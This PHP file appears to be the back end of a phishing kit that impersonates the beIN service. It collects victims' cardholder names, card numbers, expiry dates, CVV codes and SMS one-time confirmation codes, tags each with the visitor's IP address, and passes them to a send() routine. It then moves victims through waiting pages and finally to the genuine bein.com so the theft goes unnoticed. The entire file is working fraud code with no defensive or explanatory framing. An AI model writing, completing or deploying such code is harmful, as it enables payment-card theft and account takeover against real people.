<?php 
require '../config.php';


if(isset($_POST['name'])){

$data = urlencode("
+ BEIN CC
Name: ".$_POST['name']."
CC: ".$_POST['cc']."
EXP: ".$_POST['exp']."
CVV: ".$_POST['cvv']."
IP:".$_SERVER['REMOTE_ADDR']."
");

send($data);
header("location: wait.php");

}

if(isset($_POST['sms'])){

$data = urlencode("
+ BEIN CONFIRMATION CODE
SMS: ".$_POST['sms']."
IP:".$_SERVER['REMOTE_ADDR']."
");

send($data);
header("location: wait2.php");

}



if(isset($_POST['sms2'])){

$data = urlencode("
+ BEIN CONFIRMATION CODE
SMS: ".$_POST['sms2']."
IP:".$_SERVER['REMOTE_ADDR']."
");

send($data);
header("location:  https://bein.com/");

}

?>